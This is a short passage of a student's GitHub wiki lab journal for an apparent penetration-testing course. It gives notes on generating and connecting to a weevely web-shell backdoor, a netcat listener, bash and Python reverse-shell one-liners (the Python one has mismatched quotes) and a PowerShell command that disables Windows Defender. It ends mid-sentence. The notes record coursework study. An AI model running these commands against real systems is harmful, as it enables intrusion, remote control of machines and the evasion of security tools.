Module 8 - skyleroriordan/my-tech-journal GitHub Wiki

8.1

notes

to generate weevely backdoor use: weevely generate {password} {name of backdoor}

to target use: weevely http://{ip of host}{location of backdoor} {password}

reflection

I found this weeks lab to be much easier compared to previous weeks. Weevely seems pretty straightforward and I think I got a good grasp on it.

8.2

notes

to start listener I used nc -nlvp 4449

to get a reverse shell to connect to listener used /bin/bash -i >& /dev/tcp/{IP_of_listener}/{listening_port} 0>&1

to turn off Windows Defender use Set-MpPreference -DisableRealtimeMonitoring $true in Powershell

to get a python reverse shell use python3 -c 'import sys, os, socket, pty;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('10.0.17.103',4449));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/bash');"

Reflection

This lab was